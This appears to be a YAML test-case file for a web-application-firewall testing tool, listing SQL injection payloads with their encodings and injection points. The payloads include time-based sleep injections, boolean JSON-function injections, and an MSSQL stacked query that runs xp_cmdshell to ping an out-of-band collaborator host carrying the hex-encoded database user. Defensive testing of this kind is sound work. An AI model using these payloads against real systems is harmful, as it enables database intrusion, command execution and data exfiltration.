16 lines
665 B
YAML
16 lines
665 B
YAML
payload:
|
|
- "(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'%22+(select(0)from(select(sleep(15)))v)+%22*/"
|
|
- "3;/* a */ DECLARE @c varchar(255);/* b */SELECT @c='ping '+master.sys.fn_varbintohexstr(convert(varbinary,SYSTEM_USER))+'.000.burpcol'+'laborator.net';/*xx*/ EXEC Master.dbo.xp_cmdshell @c;/*xxx*/ EXEC sp_SYS_ProtoOp @id=3"
|
|
- "-1134') OR JSON_EXTRACT('{''aKER'': 9648}', '$.aKER') = 9648*7799 AND ('QlYa' LIKE 'QlYa"
|
|
- "123) AND 12=12 AND JSON_DEPTH('{}') != 2521"
|
|
encoder:
|
|
- Base64Flat
|
|
- URL
|
|
placeholder:
|
|
- URLPath
|
|
- URLParam
|
|
- JSONRequest
|
|
- Header
|
|
- HTMLForm
|
|
- HTMLMultipartForm
|
|
type: SQL Injection
|